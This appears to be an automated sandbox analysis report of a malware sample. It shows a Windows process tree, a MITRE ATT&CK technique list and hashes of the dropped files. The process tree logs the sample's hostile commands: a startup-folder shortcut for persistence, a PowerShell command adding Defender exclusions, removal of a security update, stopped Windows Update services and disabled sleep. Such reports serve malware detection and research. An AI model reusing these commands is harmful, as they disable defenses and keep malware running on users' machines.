C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1928,16424752521401531120,12451120236760659005,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2276 /prefetch:33⤵PID:2004
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1928,16424752521401531120,12451120236760659005,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2664 /prefetch:83⤵PID:4680
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1928,16424752521401531120,12451120236760659005,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3520 /prefetch:13⤵PID:3936
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1928,16424752521401531120,12451120236760659005,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3532 /prefetch:13⤵PID:4976
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1928,16424752521401531120,12451120236760659005,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4280 /prefetch:13⤵PID:1656
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1928,16424752521401531120,12451120236760659005,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4256 /prefetch:13⤵PID:4372
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1928,16424752521401531120,12451120236760659005,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4392 /prefetch:83⤵PID:1240
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1928,16424752521401531120,12451120236760659005,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4648 /prefetch:83⤵PID:3516
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --profile-directory=Default2⤵
- Enumerates system info in registry
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
PID:5016 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffbe9f13cb8,0x7ffbe9f13cc8,0x7ffbe9f13cd83⤵PID:5532
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1928,6132358409567136835,17676030144620921982,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1916 /prefetch:23⤵PID:6388
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1928,6132358409567136835,17676030144620921982,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2288 /prefetch:33⤵PID:3716
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1928,6132358409567136835,17676030144620921982,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2524 /prefetch:83⤵PID:1832
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1928,6132358409567136835,17676030144620921982,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3332 /prefetch:13⤵PID:4540
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1928,6132358409567136835,17676030144620921982,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3340 /prefetch:13⤵PID:712
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1928,6132358409567136835,17676030144620921982,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4144 /prefetch:13⤵PID:2520
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1928,6132358409567136835,17676030144620921982,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4176 /prefetch:13⤵PID:1952
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1928,6132358409567136835,17676030144620921982,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3668 /prefetch:83⤵PID:5144
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1928,6132358409567136835,17676030144620921982,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4748 /prefetch:83⤵PID:7340
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1928,6132358409567136835,17676030144620921982,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4352 /prefetch:13⤵PID:8492
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1928,6132358409567136835,17676030144620921982,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4336 /prefetch:13⤵PID:7680
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1928,6132358409567136835,17676030144620921982,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4996 /prefetch:13⤵PID:5316
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1928,6132358409567136835,17676030144620921982,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4820 /prefetch:13⤵PID:6904
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1928,6132358409567136835,17676030144620921982,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4884 /prefetch:13⤵PID:7976
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1928,6132358409567136835,17676030144620921982,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4656 /prefetch:13⤵PID:7560
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1928,6132358409567136835,17676030144620921982,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4156 /prefetch:13⤵PID:6080
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1928,6132358409567136835,17676030144620921982,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5020 /prefetch:13⤵PID:3652
-
-
-
C:\Windows\SYSTEM32\cmd.execmd /k echo [InternetShortcut] > "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ZeusChat.url" & echo URL="C:\Users\Admin\AppData\Local\CyberSphere Dynamics\ZeusChat.js" >> "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ZeusChat.url" & exit2⤵
- Drops startup file
PID:6164
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc1⤵PID:3420
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo1⤵PID:3460
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵PID:3840
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵PID:3904
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k UdkSvcGroup -s UdkUserSvc1⤵PID:3988
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵PID:4004
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{973D20D7-562D-44B9-B70B-5A0F49CCDF3F}1⤵PID:4272
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k osprivacy -p -s camsvc1⤵PID:4416
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc1⤵PID:3256
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc1⤵PID:2372
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc1⤵PID:2760
-
C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service1⤵PID:1216
-
C:\Windows\system32\SppExtComObj.exeC:\Windows\system32\SppExtComObj.exe -Embedding1⤵PID:4648
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager1⤵PID:1908
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵PID:4240
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s PcaSvc1⤵PID:2884
-
C:\Windows\System32\rundll32.exeC:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding1⤵PID:4840
-
C:\Windows\system32\wbem\wmiprvse.exeC:\Windows\system32\wbem\wmiprvse.exe -Embedding1⤵PID:1168
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:5188
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:5488
-
C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"1⤵PID:6968
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 576 -p 7448 -ip 74481⤵PID:7472
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:3696
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:3416
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:5736
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:704
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k WerSvcGroup1⤵PID:2612
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 456 -p 5616 -ip 56162⤵PID:5308
-
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵PID:2036
-
C:\Windows\system32\ApplicationFrameHost.exeC:\Windows\system32\ApplicationFrameHost.exe -Embedding1⤵PID:6068
-
C:\Windows\ImmersiveControlPanel\SystemSettings.exe"C:\Windows\ImmersiveControlPanel\SystemSettings.exe" -ServerName:microsoft.windows.immersivecontrolpanel1⤵PID:2688
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s NPSMSvc1⤵PID:7084
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s BthAvctpSvc1⤵PID:2028
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s SstpSvc1⤵PID:8568
-
C:\Windows\system32\OpenWith.exeC:\Windows\system32\OpenWith.exe -Embedding1⤵
- Suspicious use of SetWindowsHookEx
PID:8824
-
C:\Windows\system32\wbem\wmiprvse.exeC:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding1⤵PID:5160
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s fdPHost1⤵PID:6408
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s FDResPub1⤵PID:7708
-
C:\ProgramData\Mig\Mig.exeC:\ProgramData\Mig\Mig.exe1⤵
- Checks BIOS information in registry
PID:3948 -
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force2⤵
- Command and Scripting Interpreter: PowerShell
- Modifies data under HKEY_USERS
PID:5196 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:3716
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart2⤵PID:2004
-
C:\Windows\system32\wusa.exewusa /uninstall /kb:890830 /quiet /norestart3⤵PID:8228
-
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop UsoSvc2⤵
- Launches sc.exe
PID:2852
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop WaaSMedicSvc2⤵
- Launches sc.exe
PID:7664
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop wuauserv2⤵
- Launches sc.exe
PID:3864
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop bits2⤵
- Launches sc.exe
PID:5280
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop dosvc2⤵
- Launches sc.exe
PID:6264
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 02⤵
- Power Settings
PID:4940
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 02⤵
- Power Settings
PID:5192
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-ac 02⤵
- Power Settings
PID:660
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-dc 02⤵
- Power Settings
PID:6828
-
-
C:\Windows\system32\dialer.exeC:\Windows\system32\dialer.exe2⤵PID:7336
-
-
C:\Windows\system32\dialer.exeC:\Windows\system32\dialer.exe2⤵PID:4920
-
-
C:\Windows\system32\dialer.exedialer.exe2⤵PID:6596
-
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs1⤵PID:7676
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs1⤵PID:5992
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k WerSvcGroup1⤵PID:7852
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 492 -p 6256 -ip 62562⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:6380
-
-
C:\Windows\explorer.exeC:\Windows\explorer.exe /factory,{5BD95610-9434-43C2-886C-57852CC8A120} -Embedding1⤵PID:4956
-
C:\Windows\system32\msdt.exe-skip TRUE -path "C:\Windows\diagnostics\system\networking" -af "C:\Users\Admin\AppData\Local\Temp\NDF2C7F.tmp" -ep "NetworkDiagnosticsGenericNetConnection"2⤵PID:7004
-
-
C:\Windows\System32\rundll32.exe"C:\Windows\System32\rundll32.exe" devmgr.dll,DeviceProperties_RunDLL /DeviceId "PCI\VEN_10EC&DEV_8139&SUBSYS_11001AF4&REV_20\3&11583659&0&18"2⤵PID:8440
-
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s Netman1⤵PID:1724
-
C:\Windows\System32\sdiagnhost.exeC:\Windows\System32\sdiagnhost.exe -Embedding1⤵PID:3516
-
C:\Windows\system32\netsh.exe"C:\Windows\system32\netsh.exe" trace diagnose Scenario=NetworkSnapshot Mode=NetTroubleshooter2⤵PID:8348
-
-
C:\Windows\system32\netsh.exe"C:\Windows\system32\netsh.exe" trace diagnose Scenario=NetworkSnapshot Mode=NetTroubleshooter2⤵PID:7132
-
-
C:\Windows\system32\ipconfig.exe"C:\Windows\system32\ipconfig.exe" /all2⤵
- Gathers network information
PID:6692
-
-
C:\Windows\system32\ROUTE.EXE"C:\Windows\system32\ROUTE.EXE" print2⤵PID:8580
-
-
C:\Windows\system32\makecab.exe"C:\Windows\system32\makecab.exe" /f NetworkConfiguration.ddf2⤵PID:5716
-
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNoNetwork -p -s DPS1⤵PID:7056
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s WdiSystemHost1⤵PID:4856
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalService -p -s WdiServiceHost1⤵PID:1752
Network
MITRE ATT&CK Enterprise v15
Execution
Command and Scripting Interpreter
3JavaScript
1PowerShell
1Scheduled Task/Job
1Scheduled Task
1System Services
2Service Execution
2Persistence
Boot or Logon Autostart Execution
2Registry Run Keys / Startup Folder
2Create or Modify System Process
2Windows Service
2Event Triggered Execution
2Image File Execution Options Injection
1Netsh Helper DLL
1Modify Authentication Process
1Power Settings
1Scheduled Task/Job
1Scheduled Task
1Privilege Escalation
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Boot or Logon Autostart Execution
2Registry Run Keys / Startup Folder
2Create or Modify System Process
2Windows Service
2Event Triggered Execution
2Image File Execution Options Injection
1Netsh Helper DLL
1Scheduled Task/Job
1Scheduled Task
1Defense Evasion
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Impair Defenses
2Disable or Modify Tools
1Indicator Removal
2File Deletion
1Network Share Connection Removal
1Modify Authentication Process
1Modify Registry
3Virtualization/Sandbox Evasion
2Credential Access
Credentials from Password Stores
1Credentials from Web Browsers
1Modify Authentication Process
1Steal Web Session Cookie
1Unsecured Credentials
3Credentials In Files
3Discovery
Browser Information Discovery
1Network Service Discovery
3Network Share Discovery
1Peripheral Device Discovery
1Process Discovery
1Query Registry
8Remote System Discovery
2System Information Discovery
7System Location Discovery
1System Language Discovery
1System Network Configuration Discovery
1Internet Connection Discovery
1Virtualization/Sandbox Evasion
2Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1.0MB
MD5c63860691927d62432750013b5a20f5f
SHA103678170aadf6bab2ac2b742f5ea2fd1b11feca3
SHA25669d2f1718ea284829ddf8c1a0b39742ae59f2f21f152a664baa01940ef43e353
SHA5123357cb6468c15a10d5e3f1912349d7af180f7bd4c83d7b0fd1a719a0422e90d52be34d9583c99abeccdb5337595b292a2aa025727895565f3a6432cab46148de
-
C:\Users\Admin\AppData\Local\ElevatedDiagnostics\460911090\2024112719.000\NetworkDiagnostics.debugreport.xml
Filesize135KB
MD5aee60f39a7307f0cffd6a7d1c52013e6
SHA1edb1f2a1263974b4a0c0159ee919fa59bcb0fd59
SHA256779bb437f5e265c0ef9601cefb1e886fef33d409192cd51cbeda34ab4a9464f6
SHA512c9646e29ce9b274d66e1d766f15e6618ab2ab7c3c5e044451e3b664901ff2df3ef3c8dd7456a63d98c570a703e92c58d3d4ad18bb7b2f463f1a9678df4b62dc4
-
Filesize
37KB
MD500a9ad88df7abb00850d4a5f2a1654fe
SHA15eace16fcd5233a0ff77b28dce8f60d68f1fd548
SHA25693097924d2f1c6a813829d4aff14234bf06723191f1f0ec9a19e088387f08bae
SHA512e65d6eec5f92ae533b67a87a4a9b2e3502f748e36675e1d510befabd43512197b8259aa35985caf3a030d438499ae84925fa5f1023b0ff961f49df7e47c9eb4d
-
Filesize
47KB
MD590df783c6d95859f3a420cb6af1bafe1
SHA13fe1e63ca5efc0822fc3a4ae862557238aa22f78
SHA25606db605b5969c93747313e6409ea84bdd8b7e1731b7e6e3656329d77bcf51093
SHA512e5dcbb7d8f42eabf42966fccee11c3d3e3f965ecc7a4d9e4ecd0382a31c4e8afea931564b1c6931f6d7e6b3650dc01a4a1971e317dab6c1f03932c6b6b7d399f
-
Filesize
2B
MD5d751713988987e9331980363e24189ce
SHA197d170e1550eee4afc0af065b78cda302a97674c
SHA2564f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945
SHA512b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af
-
Filesize
152B
MD5be8983c45152765cf6b429a3dfa9609f
SHA11e162eedfb3213c1ab1ec201b4aa7ba91b319828
SHA256106989065e76bd600640c123cd1d2fa8af8c6e00a17e264a94a988ff6653b727
SHA512429d79d7e104cbf7d1283fec2809a5d1dab38492c7b24eb447031f4ad44637bc5df16be1b04f74bc09adc1523aef90ceb402ed05da511286314e64e1922bf9aa
-
Filesize
152B
MD58956fdd8a81812861268518117d3da32
SHA16862b764b28d922a11845bd940849c313e04c583
SHA256c93f57a78ad76e23e1d86a9553e5fad085e40d85e97d62295cd5735f0b9ce020
SHA5128f1532f7aad5ddfc56df1a629c983f8ba948d23c66371eec31393b6e1814ca3a37d14bc79bef6d74e27a5dc150d13b8c331a9a8300fc63f541c79a964d710088
-
Filesize
152B
MD502a4b762e84a74f9ee8a7d8ddd34fedb
SHA14a870e3bd7fd56235062789d780610f95e3b8785
SHA256366e497233268d7cdf699242e4b2c7ecc1999d0a84e12744f5af2b638e9d86da
SHA51219028c45f2e05a0cb32865a2554513c1536bf9da63512ff4e964c94a3e171f373493c7787d2d2a6df8012648bbefab63a9de924f119c50c39c727cf81bdc659f
-
Filesize
152B
MD5826c7cac03e3ae47bfe2a7e50281605e
SHA1100fbea3e078edec43db48c3312fbbf83f11fca0
SHA256239b1d7cc6f76e1d1832b0587664f114f38a21539cb8548e25626ed5053ea2ab
SHA512a82f3c817a6460fd8907a4ac6ab37c2129fb5466707edcfb565c255680d7f7212a5669fe2a42976150f16e4e549ea8310078f22ed35514ee1b7b45b46d8cc96e
-
Filesize
152B
MD5f49b8ae91b4f263aa9152169a1a2edc6
SHA1bd020896666add08e2daf093e722fb537574be12
SHA2563114490a75c3530d62f11e95eda8889fb6947dbe6c13d1f67399741fbdb81c44
SHA512c765af35f4ef2bdd17d1ea9a8a8a6d5af93f6115a690735dcaf8fe554c1fef231cf3e8cb8b0f807ba9b1fcbdded146405afe279c00328f63e0e922fe44c02191
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\81bf2549-628c-4f97-9649-14a214d43b9c.tmp
Filesize1B
MD55058f1af8388633f609cadb75a75dc9d
SHA13a52ce780950d4d969792a2559cd519d7ee8c727
SHA256cdb4ee2aea69cc6a83331bbe96dc2caa9a299d21329efb0336fc02a82e1839a8
SHA5120b61241d7c17bcbb1baee7094d14b7c451efecc7ffcbd92598a0f13d313cc9ebc2a07e61f007baf58fbf94ff9a8695bdd5cae7ce03bbf1e94e93613a00f25f21
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index
Filesize144B
MD53b75aaaef8d4488a9e871e98732a5165
SHA1a657e5ae5ccc02baa9d27b4f5177e48bbf5f3fa9
SHA256cca0fa6abc0e3c7aecc48be435781cb676caf491c3d1da2998e3bb11f67ddb20
SHA512c6cc86d221fe62f0731890acbf741016b77d5535230d53cc72c9796201d7c0be4d840290838607132967a16824cf678ed1a899278084c8332973498758610f9e
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\IndexedDB\https_cloud.google.com_0.indexeddb.leveldb\CURRENT
Filesize16B
MD546295cac801e5d4857d09837238a6394
SHA144e0fa1b517dbf802b18faf0785eeea6ac51594b
SHA2560f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443
SHA5128969402593f927350e2ceb4b5bc2a277f3754697c1961e3d6237da322257fbab42909e1a742e22223447f3a4805f8d8ef525432a7c3515a549e984d3eff72b23
-
Filesize
1KB
MD56a2f6229e008b4a73f793dba64ef15c8
SHA1145448c3b1f3dc5fef065d2025dd8e44f8321a4e
SHA256e5a1a5a5d28a10aef3953f618ce11e03a9e3cbfd1def89019c8c407852eb0f87
SHA512ad3107d431b92b300570e9ee73a4c0db57937de666b845220552554b633d7d78a8c508dd04439e23c8b65a9d90f999805b521f54a0e3129dc8e973732bc88118
-
Filesize
1KB
MD57f38ff4f0a3439a812b82fc333f71e3e
SHA1d17167911dd023d31447a848f4869aa118a5a7a3
